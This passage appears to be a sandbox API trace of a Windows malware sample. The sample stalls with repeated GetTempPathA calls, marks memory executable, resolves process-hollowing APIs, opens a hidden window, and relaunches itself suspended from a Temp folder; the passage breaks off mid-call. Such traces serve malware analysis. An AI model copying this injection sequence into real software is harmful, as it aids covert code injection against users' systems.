| out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.182] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.183] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.184] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.185] GetTempPathA (in: nBufferLength=0x0, lpBuffer=0x0 | out: lpBuffer=0x0) returned 0x25 [0112.336] VirtualProtect (in: lpAddress=0x2134d0, dwSize=0x564a0, flNewProtect=0x40, lpflOldProtect=0x12fe48 | out: lpflOldProtect=0x12fe48*=0x4) returned 1 [0112.337] GetProcessAffinityMask (in: hProcess=0x0, lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0 | out: lpProcessAffinityMask=0x0, lpSystemAffinityMask=0x0) returned 0 [0112.337] LoadLibraryA (lpLibFileName="user32") returned 0x76b40000 [0112.337] GetProcAddress (hModule=0x76b40000, lpProcName="MessageBoxA") returned 0x76b9ea11 [0112.337] LoadLibraryA (lpLibFileName="kernel32") returned 0x76910000 [0112.337] GetProcAddress (hModule=0x76910000, lpProcName="WinExec") returned 0x7699e5fd [0112.337] GetProcAddress (hModule=0x76910000, lpProcName="CreateFileA") returned 0x7695cee8 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="WriteFile") returned 0x76961400 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="CloseHandle") returned 0x7695ca7c [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="CreateProcessA") returned 0x76912082 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="GetThreadContext") returned 0x76970cc1 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAlloc") returned 0x76962fb6 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="VirtualAllocEx") returned 0x7694c1b6 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="VirtualFree") returned 0x76961da4 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="ReadProcessMemory") returned 0x7694c1ce [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="WriteProcessMemory") returned 0x7694c1de [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="SetThreadContext") returned 0x769a0193 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="ResumeThread") returned 0x76950f1c [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="WaitForSingleObject") returned 0x7695ba90 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="GetModuleFileNameA") returned 0x769633f6 [0112.338] GetProcAddress (hModule=0x76910000, lpProcName="GetCommandLineA") returned 0x769698ff [0112.338] LoadLibraryA (lpLibFileName="ntdll.dll") returned 0x77230000 [0112.338] GetProcAddress (hModule=0x77230000, lpProcName="NtUnmapViewOfSection") returned 0x772769b8 [0112.338] GetProcAddress (hModule=0x76b40000, lpProcName="RegisterClassExA") returned 0x76b46293 [0112.338] GetProcAddress (hModule=0x76b40000, lpProcName="CreateWindowExA") returned 0x76b4bf40 [0112.338] GetProcAddress (hModule=0x76b40000, lpProcName="PostMessageA") returned 0x76b4b446 [0112.338] GetProcAddress (hModule=0x76b40000, lpProcName="GetMessageA") returned 0x76b51899 [0112.338] GetProcAddress (hModule=0x76b40000, lpProcName="DefWindowProcA") returned 0x76b4bb1c [0112.338] RegisterClassExA (param_1=0x12fbc0) returned 0xc13d [0112.342] CreateWindowExA (dwExStyle=0x200, lpClassName="bxVV7cGHPHusOnmHbFKqGnzKMpomaw", lpWindowName="ptodEzQlWskupc762Nhc3wjD8apfHQ", dwStyle=0xcf0000, X=-2147483648, Y=-2147483648, nWidth=1000, nHeight=1000, hWndParent=0x0, hMenu=0x0, hInstance=0x0, lpParam=0x0) returned 0xf013c [0112.396] PostMessageA (hWnd=0xf013c, Msg=0x400, wParam=0x64, lParam=0x1f4) returned 1 [0112.396] GetMessageA (in: lpMsg=0x12fbf0, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0 | out: lpMsg=0x12fbf0) returned 1 [0112.396] VirtualAlloc (lpAddress=0x0, dwSize=0x2800, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0112.396] GetModuleFileNameA (in: hModule=0x0, lpFilename=0x1c0000, nSize=0x2800 | out: lpFilename="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe" (normalized: "c:\\users\\eebsym5\\appdata\\local\\temp\\bkm66byk.exe")) returned 0x30 [0112.396] GetCommandLineA () returned="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"" [0112.396] CreateProcessA (in: lpApplicationName="C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe", lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=0, dwCreationFlags=0x4, lpEnvironment=0x0, lpCurrentDirectory=0x0, lpStartupInfo=0x12faf0*(cb=0x0, lpReserved=0x0, lpDesktop=0x0, lpTitle=0x0, dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x12fb48 | out: lpCommandLine="\"C:\\Users\\EEBsYm5\\AppData\\Local\\Temp\\bkM66bYk.exe\" \"C:\\Users\\EEBsYm5\\AppData\\Roaming\\vMfCCeRYkvQy\\\" \"7l6OWDI9Fmrsoy1O\" \"340_LESS_1GB\" \"60000\"", lpProcessInformation=0x12fb48*(hProcess=0x4c, hThread=0x48, dwProcessId=0xd80, dwThreadId=0xd84)) returned 1 [0112.398] VirtualFree (lpAddress=0x1c0000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0112.399] VirtualAlloc (lpAddress=0x0, dwSize=0x4, flAllocationType=0x1000, flProtect=0x4) returned 0x1c0000 [0112.399] GetThreadContext (in: hThread=0x48, lpContext=0x1c0000 | out: lpContext=0x1c0000*(ContextFlags=0x10007, Dr0=0x0, Dr1=0x0, Dr2=0x0, Dr3=0x0, Dr6=0x0, Dr7=0x0, FloatSave.ControlWord=0x0, FloatSave.StatusWord=0x0, FloatSave.TagWord=0x0, FloatSave.ErrorOffset=0x0, FloatSave.ErrorSelector=0x0, FloatSave.DataOffset=0x0, FloatSave.DataSelector=0x0, FloatSave.RegisterArea=([0]=0x0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x0, [8]=0x0, [9]=0x0, [10]=0x0, [11]=0x0, [12]=0x0, [13]=0x0, [14]=0x0, [15]=0x0, [16]=0x0, [17]=0x0, [18]=0x0, [19]=0x0, [20]=0x0, [21]=0x0, [22]=0x0, [23]=0x0, [24]=0x0, [25]=0x0, [26]=0x0, [27]=0x0, [28]=0x0, [29]=0x0, [30]=0x0, [31]=0x0, [32]=0x0, [33]=0x0, [34]=0x0, [35]=0x0, [36]=0x0, [37]=0x0, [38]=0x0, [39]=0x0, [40]=0x0, [41]=0x0, [42]=0x0, [43]=0x0, [44]=0x0, [45]=0x0, [46]=0x0, [47]=0x0, [48]=0x0, [49]=0x0, [50]=0x0, [51]=0x0, [52]=0x0, [53]=0x0, [54]=0x0, [55]=0x0, [56]=0x0, [57]=0x0, [58]=0x0, [59]=0x0, [60]=0x0, [61]=0x0, [62]=0x0, [63]=0x0, [64]=0x0, [65]=0x0, [66]=0x0, [67]=0x0, [68]=0x0, [69]=0x0, [70]=0x0, [71]=0x0, [72]=0x0, [73]=0x0, [74]=0x0, [75]=0x0, [76]=0x0, [77]=0x0, [78]=0x0, [79]=0x0), FloatSave.Cr0NpxState=0x0, SegGs=0x0, SegFs=0x3b, SegEs=0x23, SegDs=0x23, Edi=0x0, Esi=0x0, Ebx=0x7ffd8000, Edx=0x0, Ecx=0x0, Eax=0x402581, 